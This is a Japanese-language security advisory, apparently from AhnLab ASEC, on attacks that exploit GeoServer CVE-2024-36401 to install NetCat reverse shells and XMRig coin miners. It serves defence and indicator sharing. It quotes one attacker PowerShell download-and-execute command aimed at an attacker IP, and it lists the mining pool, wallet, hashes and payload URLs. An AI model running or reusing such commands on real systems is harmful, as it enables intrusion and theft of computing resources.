Posted By ATCP , 2025년 07월 10일

GeoServer 脆弱性を悪用するコインマイナー攻撃の事例

AhnLab SEcurity intelligence Center (ASEC) は、脆弱性がパッチ適用されていない GeoServer が最近まで持続的な攻撃対象になっていることを確認した。攻撃者は脆弱な GeoServer をスキャンした後、コインマイナーをインストールしていると考えられ、これを通じて韓国国内でも感染事例を確認することができた。

1. GeoServer リモートコード実行脆弱性 (CVE-2024-36401)

GeoServer は、Java で作成されたオープンソース GIS (Geographic Information System) サーバーであり、地理空間データ処理機能をサポートするプラットフォームである。2024 年に認証されていないユーザーがリモートコードを実行できる脆弱性 CVE-2024-36401 が公開され、その後さまざまな攻撃者がこれを悪用してマルウェアをインストールしている。

2024 年 9 月、Fortinet 社は CVE-2024-36401 脆弱性を悪用して GOREVERSE、SideWalk、Mirai、Condi、CoinMiner などのマルウェアを配布する攻撃事例を公開した。[1] そして、TrendMicro 社でも Earth Baxia 攻撃者の攻撃キャンペーンを公開したが、台湾の国の機関を対象にしたスピアフィッシングと共に CVE-2024-36401 脆弱性が悪用されたことが知られた。[2]

2. 韓国国内の攻撃事例

韓国国内の場合、GeoServer がインストールされた Windows 環境がその対象であり、インストールされた GeoServer が CVE-2024-36401 脆弱性がパッチ適用されていないバージョンであることから、マルウェアのインストール過程で CVE-2024-36401 脆弱性が悪用された可能性が高い。攻撃者は脆弱性を悪用して PowerShell コマンドを実行し、最終的に NetCat と XMRig コインマイナーをインストールした。

図 1. 脆弱性攻撃で実行された PowerShell プロセス

2.1. NetCat

攻撃者は最初の侵入プロセスでダウンローダー機能を担当する PowerShell コマンドを実行するが、その前に PowerShell スクリプト「adminc.ps1」をダウンロードして NetCat をインストールする。Netcat は TCP / UDP プロトコルで接続されたネットワーク上で特定の対象とデータを送受信させるユーティリティであるが、リモートシェルとして悪用される可能性があるため、感染システムを制御する目的で悪用されることがある。「-e」インジケーターによって実行された NetCat は C&C サーバーに接続してリバースシェルとして動作し、攻撃者は C&C サーバーから感染システムを制御できるようになる。

図 2. NetCat インストールルーチン

2.2. XMRig

マルウェアの配布アドレスでは XMRig をインストールする PowerShell スクリプトと Bash スクリプトの両方が確認されている。攻撃者は GeoServer がインストールされている OS に応じてそれぞれのスクリプトを使用して XMRig をインストールしたと推定される。Windows 環境では脆弱な GeoServer が次のような PowerShell コマンドを実行し、ダウンロードされた PowerShell スクリプトが XMRig をインストールした。

> IEX(New-ObjectNet.WebClient).DownloadString(‘hxxp://182.218.82.[1]4/js/1/gw.txt’)

図 3. XMRig をインストールする PowerShell スクリプト

Linux ターゲット攻撃事例では、Bash スクリプトが悪用されると推定され、Windows ターゲット攻撃事例と同様に XMRig と設定ファイルをダウンロードします。Bash マルウェアは、競合コインマイナーと思われるプロセスを終了し、「startup.sh」を実行して XMRig を起動します。

図 4. XMRig をインストールする Bash スクリプト

Bash スクリプトはこの他にも持続性を維持するために Cron 作業にコマンドを登録しますが、該当コマンドは Pastebin からダウンロードしたスクリプトを実行する機能を担います。

図 5. Pastebin で追加コマンドを実行する Cron 作業

url : pool.supportxmr.com:443
user : 47DsNc5pK8rYBQF4ev3mNBct3tkkHuUmxeqCSSbX3YuBhXweSB9XeQbcPMqEBaSJy4bGrPxbdMJkphrVQ5AmastoEMpSjcU
pass : x

3. 結論

GeoServer のリモートコード実行脆弱性 (CVE-2024-36401) が公開されて以降、最近までに同脆弱性を悪用してマルウェアをインストールする事例が確認されている。攻撃者は Windows および Linux 環境を含め、脆弱な GeoServer がインストールされている環境を攻撃対象としており、NetCat と XMRig コインマイナーをインストールした。コインマイナーがインストールされると、システムのリソースを利用して攻撃者の Monero コインをマイニングすることになり、攻撃者は今後インストールした NetCat を利用して別のマルウェアをインストールしたり、システム内の情報を窃取するなど、さまざまな悪意のある振る舞いを行う可能性がある。

MD5

0b3744373c32dc6de80dfc081200d9f8

310c17c19e90381114d47914bcb3ccf2

523613a7b9dfa398cbd5ebd2dd0f4f38

5e84c2bcca9486b6416a8b27ed4d845e

615b348974fb3b5aea898a172fadecf4

URL

http[:]//182[.]218[.]82[.]14/js/1/config[.]json

http[:]//182[.]218[.]82[.]14/js/1/gl[.]txt

http[:]//182[.]218[.]82[.]14/js/1/gw[.]txt

http[:]//182[.]218[.]82[.]14/js/1/s[.]rar

http[:]//182[.]218[.]82[.]14/js/1/startup[.]sh

107[.]180[.]100[.]247

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories: マルウェア

Tagged as: CoinMiner, Netcat, XMRig